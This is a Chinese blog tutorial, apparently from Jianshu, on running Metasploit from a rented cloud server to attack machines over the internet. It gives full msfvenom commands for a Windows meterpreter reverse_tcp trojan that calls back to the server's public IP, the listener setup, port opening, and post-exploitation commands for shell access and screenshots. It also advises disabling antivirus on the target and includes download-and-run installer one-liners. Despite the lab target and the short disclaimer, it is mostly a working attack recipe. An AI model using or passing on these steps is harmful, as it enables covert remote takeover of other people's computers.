傻瓜式Metasploit外网渗透(无需内网穿透)

众所周知,Metasploit 是个内网渗透神器。

但是内网渗透哪有外网刺激,于是笔者上度娘搜索“msf 外网”。

搜索结果的话,

首先,虚拟机里的kali不能渗透到外网的原因是它没有外网IP。

所以大多数都是用内网穿透工具,还有一部分是通过服务器做个frp代理。

本质其实都一样。但是亲测后者比较有用。

可!是!

第二个方法有一个特点,就是很烦。

买好服务器之后再下载frp,服务器上下载完之后还得在Kali上面下。下载完天都黑了,还得改这个改那个。最后一堆ip还搞来搞去。

于是笔者就想到了。

既然都有服务器了,为啥不直接在服务器上安装msf呢???非得绕这么大圈子???

你需要这些东西

·一台能用ssh的电脑(本文以 Mac 为例)

·一台 Linux 云服务器/云主机/ECS/VPS(名字不同,实质一样,不过不是虚拟主机哦)(本文以 Debian 10 系统为例)(现在市面上的那种免费云主机就能用了)

·一台没开杀毒软件的 Windows 电脑(虚拟机)(本文以 XP SP3 为例)

安装 msf

(msf就是 Metasploit Framework 的简称)

首先你需要用ssh连上你的服务器。具体步骤我就不赘述了,可以自行百度,服务器提供商应该也有教程提供。

用以下命令下载msf的安装包。

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

将其设为可执行文件。

chmod +x msfinstall

运行安装包。

./msfinstall

初始化数据库

msfdb init

(运行到这里笔者的服务器报错说在root用户下不能运行这个命令,所以我就直接略过初始化数据库了,其实不运行这个命令貌似也不会有什么问题)

然后你的服务器上就已经安装好了msf。

配置宝塔面板

因为这是服务器,不是虚拟机。上传下载文件非常不方便。所以我们这里安装一个宝塔面板。

这是官方教程

wget -O install.sh http://download.bt.cn/install/install-ubuntu_6.0.sh && bash install.sh

安装完之后,复制终端给的链接,进入面板。

它会跳出来让你推荐安装的东西。我们这里先不用安装。

生成木马

我们回到终端,运行下面的命令生成木马。

msfvenom -p windows/meterpreter/reverse_tcp lhost=(你的服务器外网ip) lport=(随便取个端口号) -f exe > /root/(木马文件名).exe


-p 设置payload,无需改动

lhost 监听IP,此处填你服务器的外网IP(一定要外网ip,不然目标机器找不到你。比如你家住在xx市xx路xx号xx室,你某宝买东西就填xx室,谁找得到你啊喂。)

lport 监听端口,这里随便写一个,最好是4位数,而且没有规律的那种。不然端口已经可能被占用了。

-f 生成文件的格式 > 文件放置的目录和文件名 (一般放在root目录下即可)


比如你的服务器外网ip是 某某某.某某某.某某某.某某某

端口想选 1086

木马文件放在 /root/iammuma.exe

你就应该运行

msfvenom -p windows/meterpreter/reverse_tcp lhost= 某某某.某某某.某某某.某某某 lport=1086 -f exe > /root/iammuma.exe



木马生成成功

开放端口/下载木马

这时候,我们就需要用到宝塔面板了。

开放端口

点击左侧菜单中的 安全

增加一个放行端口。

端口填上面的你选的。

备注/说明随便写。

下载木马

点击左侧菜单中的 文件

宝塔面板文件

再点击根目录。


根目录

再点击进入root文件夹。


root文件夹

我们可以看到,木马已经生成了。

点击下载,然后拖入 Windows 虚拟机中。


木马在虚拟机中

先别急着运行木马。

开始监听

你需要把msf的监听打开,才能检测到木马返回的数据。

第一次,我设置lhost为127.0.0.1。

127.0.0.1是回送地址,指本地机,一般用来测试使用。——百度百科

结果

用127.0.0.1

在虚拟机狂点木马也没反应。

于是我改用外网IP。

于是就成功了。hhhhh庆祝一下。


成功

(看到meterpreter就是成功了,目标机基本上就已经被你掌握在手里了)



步骤:

1 进入msf

msfconsole


2 加载监听模块

use exploit/multi/handler


3 设置payload,要和木马设置的payload相同,如果你是按照上文来的话就不用修改。

set payload windows/meterpreter/reverse_tcp


4 设置监听ip,就是你的服务器外网ip

set lhost (服务器外网IP)


5 设置端口,lport后面的数字就是你之前设置的端口。如果你是按照上文来的话就也不用修改。

set lport 1086


6 开始监听

run


7 在虚拟机里点击木马。

(如果点一次不行就多点几次。一定要关掉杀毒软件!!!等10秒左右一般都能有了)

搞定之后

这里就写一下 meterpreter 的一些基本操作。

shell

这个命令就可以用目标机的cmd控制目标机。



screenshot


截图

这个命令就可以给目标机截图。

我们可以在宝塔面板里找到截下来的图片。


宝塔面板里的截图

总结

总的来说,就是在服务器上生成木马并监听,并且用宝塔面板开启端口并下载木马文件,最后在 Windows 上运行木马。

本教程仅供学习用,严禁用于非法用途。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容